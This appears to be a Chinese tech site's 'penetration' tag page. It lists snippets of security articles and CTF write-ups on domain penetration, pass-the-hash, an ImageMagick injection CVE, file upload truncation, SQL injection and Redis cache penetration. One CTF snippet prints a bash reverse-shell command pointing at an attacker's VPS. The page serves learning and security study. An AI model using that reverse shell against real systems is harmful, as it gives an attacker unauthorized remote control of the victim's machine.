E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
penetration
unity驱动3d模特跳舞 穿模问题 穿透
是的,这个问题在3D建模和动画领域通常被称为“穿模”(Clipping)或“穿透”(
Penetration
)。
AI视觉网奇
·
2024-02-25 00:07
unity
unity
3d
游戏引擎
域渗透(Domain
penetration
)
一、域的简介域其实就是一些计算机所组成的。一个电脑也能是一个域,一堆电脑也可以是一个域。域控账号可以登录域内任意主机二、Windows认证协议-Kerberos在域中一台电脑上要登录另一台的用户,需要一个通信证,这个通行证就叫做票据。例如:你用域管账户登录三、域渗透-哈希传递域控管理员会用自己的域控账号登录客户机,那么我们就可以抓取到域控的账号和密码。但是密码并不一定抓取到的都是明文,如果是Win
廾匸0705
·
2024-01-19 08:59
网络安全
域
Penetration
Testing、Security Testing、Automation Testing
相关学习资料http://www.cnblogs.com/LittleHann/p/3823513.htmlhttp://www.cnblogs.com/LittleHann/p/3828927.htmlhttp://www.searchsecurity.com.cn/showcontent_56011.htmhttps://www.owasp.org/index.php/File:OWASP_T
weixin_30627381
·
2023-11-06 20:47
数据库
shell
php
Windows11
Penetration
Suite Toolkit V2.1
README.md系统简介本环境旨在提供一个开箱即用的windows渗透测试环境;本项目欢迎转载,转载时请注明原作者和原文链接:GitHub-arch3rPro/Pentest-Windows:Windows11PenetrationSuiteToolkitGitHub-arch3rPro/Pentest-Windows:Windows11PenetrationSuiteToolkitGitHub
9917870
·
2023-10-19 02:19
网络安全
测试工具
了解什么是 redis 的雪崩、穿透和击穿?redis 崩溃之后会怎么样?系统该如何应对这种情况?如何处理 redis 的穿透?
github.com/doocs/advanced-java/blob/master/docs/high-concurrency/redis-caching-avalanche-and-caching-
penetration
.md
yanglbme
·
2023-10-16 15:46
了解什么是 redis 的雪崩、穿透和击穿?redis 崩溃之后会怎么样?系统该如何应对这种情况?如何处理 redis 的穿透?
github.com/doocs/advanced-java/blob/master/docs/high-concurrency/redis-caching-avalanche-and-caching-
penetration
.md
yanglbme
·
2023-09-28 12:21
Imagemagick 命令注入漏洞 (CVE-2016–3714)
推荐文章:https://imagetragick.comhttps://www.leavesongs.com/
PENETRATION
/CVE-2016-3714-ImageMagick.htmlhttps
n1ght_X
·
2023-04-03 20:46
web安全
ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记
学习资料https://www.cnblogs.com/bmjoker/p/9898590.htmlhttps://www.leavesongs.com/
PENETRATION
/CVE-2016-3714
小心灵呀
·
2023-04-03 19:26
web安全
2021第五届强网杯部分writewp
持续更新文章目录第五届强网杯部分题解前言一、Web1.1Web1[强网先锋]寻宝操作过程1.2web[强网先锋]赌徒操作过程1.3essyweb(by-TheTh1nk3r)1.4Hard_
Penetration
ZJL_19
·
2022-08-02 08:25
CTF
#
比赛write_up
INE
Penetration
Testing Basics 黑盒渗透测试过程
简介官方网站:https://my.ine.com/CyberSecurity/courses/6f986ca5/
penetration
-testing-basics黑盒渗透测试1启动实验室,然后对目标网站进行枚举
Ba1_Ma0
·
2022-07-27 11:15
oscp
网络
linux
安全
web安全
oscp
各大POC/EXP等合集
Penetration
_Testing_POC搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。
白昼小丑
·
2021-06-25 07:06
网络渗透
安全漏洞
网络安全
CTFHub 文件上传 - 00截断
CTFHub文件上传-00截断文件上传漏洞“%00截断”绕过讲解":https://www.fujieace.com/
penetration
-test/file-upload-00.html截断原理:0x00
poirotl
·
2021-02-18 18:09
文件上传
sql注入专辑-sqli-lab靶场安装
这里写目录标题sqli-lab的安装参考地址:https://www.fujieace.com/
penetration
-test/sqli-labs-ec.html1直接打开,会报错2修改提示的配置文件路径
8776804
·
2021-02-14 13:36
BMZCTF WEB WEB_
penetration
打开网页:发现过滤了很多字母和字符:b,d,e,-,q,f,g,i,p,j,+,k,m,n,,o,w,x,~,:,^,@,&,,%,",*,(,),!,=,.,[,],},{,_);致使我们好多命令都无法操作。最后观察至curl没有被过滤。我们就可以设置好VPS,使用VPS反弹shell设置VPS的首页为:bash-c"bash-i>&/dev/tcp/IP地址/55550>&1"在VPS上打开w
Crazy198410
·
2021-01-25 09:22
BMZCTF-WEB
安全
Penetration
_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
Penetration
_Testing_POC搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。
github导航师
·
2020-09-10 00:12
网络安全
安全漏洞
thinkphp
cms
谈一谈php://filter的妙用
感觉这篇文章写得相当不错,忍不住转载收藏转自:https://www.leavesongs.com/
PENETRATION
/php-filter-magic.htmlphp://filter是PHP中独有的协议
涙笑
·
2020-08-18 22:00
Django debug page XSS漏洞
DjangodebugpageXSS漏洞(CVE-2017-12794)学习记录i春秋实验:https://www.ichunqiu.com/vm/59863/1参考文章:https://www.leavesongs.com/
penetration
Oldbowleeeee
·
2020-08-18 19:03
安全
CTF-rootme 题解之PHP filters
Web-Server/PHP-filtershttps://challenge01.root-me.org/web-serveur/ch12/Referrence:https://www.leavesongs.com/
PENETRATION
weixin_30384031
·
2020-08-17 15:26
渗透测试(
Penetration
Testing)
渗透测试(PenetrationTesting)目录Author:ZwelLLastUpdated:2007.12.16零、前言一、简介二、制定实施方案三、具体操作过程四、生成报告五、测试过程中的风险及规避参考资料FAQ集零、前言渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就是通常所说的道德黑客行为(Ethicalh
weixin_30500105
·
2020-08-16 15:26
超全的 Linux 机器的渗透测试命令备忘表 原创 2018-01-19 OSC - 协作翻译 开源中国 协作翻译 原文:Most Important
Penetration
Testing co
MostImportantPenetrationTestingcommandsCheatSheetforLinuxMachine链接:https://techincidents.com/important-
penetration
-testing-cheat-sheet
鲍鱼哥
·
2020-08-16 05:54
Mysql 注入之 limit 注入
参考链接:https://www.leavesongs.com/
PENETRATION
/sql-injections-in-mysql-limit-clause.html一般实际过程中使用limit时,
鸡翅儿
·
2020-07-31 20:45
Penetration
Test 渗透测试
目录Author:ZwelLLastUpdated:2007.12.16零、前言一、简介二、制定实施方案三、具体操作过程四、生成报告五、测试过程中的风险及规避参考资料FAQ集零、前言渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就是通常所说的道德黑客行为(Ethicalhacking),因此我们这里的所有读者应当都是E
iteye_11341
·
2020-07-14 12:52
Google hacking for
penetration
testers
一本叫Googlehackingforpenetrationtesters的书,没什么技术含量,不过总结的很详细,老外写的,废话一大堆,花了2天时间把其中部分梳理了一下,在我读完认为500页的大部头完全50页搞定。还好不是买的,看来书真是非借不能读了。敲完之后没怎么校对,一来内容比较清晰,二来也算尽快读完归还,省得是个心思。如果是买的估计也不会整理出来,对自己也是个督促,别太懒了,看来以后读书还是
CNASP
·
2020-07-10 20:27
技术类
BuuCTF-hctf admin
参考链接:https://www.anquanke.com/post/id/164086源码泄露flasksession伪造https://www.leavesongs.com/
PENETRATION
/
Michae1_k
·
2020-07-08 10:00
【第五空间智能安全大赛】hate_php WriteUp
这让我联想到了P神的一篇文章无数字、字母构造webshell(https://www.leavesongs.com/
PENETRATION
/webshell-without-alphanum-advanced.htm
vege
·
2020-07-06 22:00
37 Powerful
Penetration
Testing Tools For Every
Penetration
Tester
Wouldn’titbefunifacompanyhiredyoutohackitswebsite/network/Server?Well,Yeah!!!Penetrationtesting,commonlycalledaspen-testingisaonarollinthetestingcirclethesedays.Thereasonisnothardtoguess–withthechange
kezhen
·
2020-07-02 06:41
DVWA之从SQL注入到写入webshell
转自:http://www.nxadmin.com/
penetration
/1141.html这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是用DVWA
beyondkmp
·
2020-06-27 01:16
web漏洞
CVE-2019-14234笔记
DjangoJSONField/HStoreFieldSQL注入漏洞(CVE-2019-14234)参考https://www.leavesongs.com/
PENETRATION
/django-jsonfield-cve
蛇皮团团怪
·
2020-06-25 20:08
分享一些无特征PHP一句话-20150719
(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)原理:https://www.leavesongs.com/
PENETRATION
/php-callback-backdoor.html
qq_27446553
·
2020-06-25 03:26
php-hack
作为一个
penetration
tester必知必读的好书推荐
原文地址http://www.hackfun.org/real-stuff-share/As-a-
penetration
-tester-must-know-and-read-books-recommended.html0x00
ncafei
·
2020-06-24 16:41
收藏
iOS - some concepts of
Penetration
Testing
1.StackCookie(akaStackCanary)StackSmashingProtection:Stacksmashingprotectionisanexploitmitigationtechniquethatprotectsagainststackoverflowattacksbyplacingarandomvalueknownasstackcanarybeforelocalvaria
jameszhouhvs
·
2020-06-23 20:09
Xamarin
PHP-Session利用总结
至于什么是服务端Session,什么是客户端Session,可以看看P神的**客户端session导致的安全问题https://www.leavesongs.com/
PENETRATION
/client
breaksafe
·
2020-06-22 19:10
PHP
渗透报告详解库
Penetration
-Test-Report来自SiriusWiki跳转至:导航,搜索目录1渗透报告详解库1.1高危1.1.1跨站脚本攻击漏洞1.1.2FTP匿名登录1.1.3程序逻辑设计缺陷1.1.4HTTP
Candyys
·
2020-06-21 18:01
漏洞原理
分享一些无特征PHP一句话
(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)原理:https://www.leavesongs.com/
PENETRATION
/php-callback-backdoor.html
weixin_34179968
·
2020-06-21 11:10
关于PHP正则的一些绕过方法
参考:https://www.leavesongs.com/
PENETRATION
/webshell-without-alphanum.htmlhttps://www.leavesongs.com/
PENETRATION
m0c1nu7
·
2020-06-21 03:02
Web
Security
利用Vulnhub复现漏洞 - PHP-FPM Fastcgi 未授权访问漏洞
使用命令执行一个默认存在的php文件任意命令执行复现Vulnhub官方复现教程https://vulhub.org/#/environments/fpm/漏洞原理https://www.leavesongs.com/
PENETRATION
江不流
·
2020-06-20 22:51
渗透
FUSE:Finding File Upload Bugs via
Penetration
Testing
20199102-孙启龙-FUSE:FindingFileUploadBugsviaPenetrationTesting目录20199102-孙启龙-FUSE:FindingFileUploadBugsviaPenetrationTestingAbstractIntroductBackgroundFileUploadinPHPWebApplicationsUFUandUEFUVulnerabili
孙启龙20199102
·
2020-06-11 22:00
湖湘杯 web300 【花样绕waf】【shell的一百种写法】
源码(转自【https://chybeta.github.io/2017/07/15/一道好玩的webshell题/】)最早在p神博客上看见的:【https://www.leavesongs.com/
PENETRATION
EEE渐渐遗忘者
·
2020-04-01 10:34
缓存雪崩 Cache Avalanche 缓存穿透 Cache
Penetration
缓存击穿 Hotspot Invalid
缓存雪崩CacheAvalanche缓存穿透CachePenetration缓存击穿HotspotInvalid浅谈缓存系统的三个问题一.无处不在的缓存缓存在计算机系统是无处不在,在CPU层面有L1-L3的Cache,在Linux中有TLB加速虚拟地址和物理地址的转换,在应用层有Redis等内存数据库缓存、在浏览器有本地缓存、手机有本地文件缓存等等。可见,缓存在计算机系统中有非常重要的地位,主要作
HackerVirus
·
2020-02-11 10:00
Ethical Hacking - Web
Penetration
Testing(2)
INFORMATIONGATHERINGIPaddress.DomainnameInfo.Technologiesused.Otherwebsitesonthesameserver.DNSrecords.Unlistedfiles,sub-domains,directories.1.WhoisLookup-Findinfoabouttheownerofthetarget.()->http://wh
晨风_Eric
·
2020-02-07 16:00
Nodejs实现简单的TCP内网穿透
完整代码在:https://gitee.com/baojuhua/node_simples/tree/master/node_simple_tcp_
penetration
1.原理解析首先了解一下,普通端口
关爱单身狗成长协会
·
2019-12-23 21:02
PHP - Filters
Retrievetheadministratorpasswordofthisapplication.对文件包含的介绍------------第一个链接需要谷歌https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-
penetration
-testing-cc9dc8dd3601https
给朕来个三分,超远的
·
2019-12-22 10:00
Ethical Hacking - NETWORK
PENETRATION
TESTING(22)
MITM-WiresharkWIresharkisanetworkprotocolanalyserthatisdesignedtohelpnetworkadministartorstokeeptrackofwhatishappeningintheirnetworkandanalyseallthepacktes.Wiresharkworksbyloggingeachpacketthatflowsth
晨风_Eric
·
2019-12-15 15:00
Ethical Hacking - NETWORK
PENETRATION
TESTING(21)
MITM-CodeInjectionInjectjavascriptorHTMLcodeintopages.Codegetsexecutedontargetmachine.Use--injectplugin.Codecanbe:1.Storedonalocalfile--js-fileor--html-file2.Storedonline--js-urlor--html-url3.Oryoucan
晨风_Eric
·
2019-12-15 14:00
Ethical Hacking - NETWORK
PENETRATION
TESTING(20)
MITM-CapturingScreenOfTarget&InjectingaKeyloggerScreenShotterPlugin:ScreenShotter:UsesHTML5Canvastorenderanaccuratescreenshotofaclientsbrowser--screenLoadplugin'ScreenShotter'--intervalSECONDSInterval
晨风_Eric
·
2019-12-14 20:00
Ethical Hacking - NETWORK
PENETRATION
TESTING(19)
MITM-DNSSpoofingDNSSpoofingallowsustoredirectanyrequesttoacertaindomaintoanotherdomain,forexamplewecanredirectanyrequestfromlive.comtoafakepage!!1.EditDNSsettingsleafpad/etc/mitmf/mitms.conf2.Runetter
晨风_Eric
·
2019-12-11 21:00
Ethical Hacking - NETWORK
PENETRATION
TESTING(18)
SessionHijackingWhatiftheuserusesthe"rememberme"feature?Iftheuserusesthisfeaturetheauthenticationhappensusingthecookiesandnottheuserandpassword,Soinsteadofsniffingthepasswordwecansniffthecookiesandinj
晨风_Eric
·
2019-12-08 20:00
Ethical Hacking - NETWORK
PENETRATION
TESTING(17)
MITM-bypassingHTTPSMostwebsitesusehttpsintheirloginpages,thismeansthatthesepagesarevalidatedusinganSSLcertificateandthereforwillshowawarningtotheuserthatthecertificateisinvalid.SSLstripisatoolthatcanb
晨风_Eric
·
2019-12-03 22:00
Google hacking for
penetration
testers
Forsitesite:csdn.net–www.csdn.net–blog.csdn.net/cnaspinurl:nqt.phpintitle:"networkquerytool"inurl:"/cgi-bin/userreg.cgi"filetype:asp"customerrormessage""asp.net_sessionid""datasource="Intext:"warning:
小蜜蜂onion
·
2019-11-30 07:35
Python Ethical Hacking - WEB
PENETRATION
TESTING(3)
CRAWLINGSUMMARYOurcrawlersofarcanguess:Subdomains.Directories.Files.Advantages:->Discover"hidden"paths/pathsadmindoesnotwantustoknow.Disadvantages:->Willdoesnotdiscovereverything.Solution:->Analysedis
晨风_Eric
·
2019-10-19 22:00
上一页
1
2
3
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他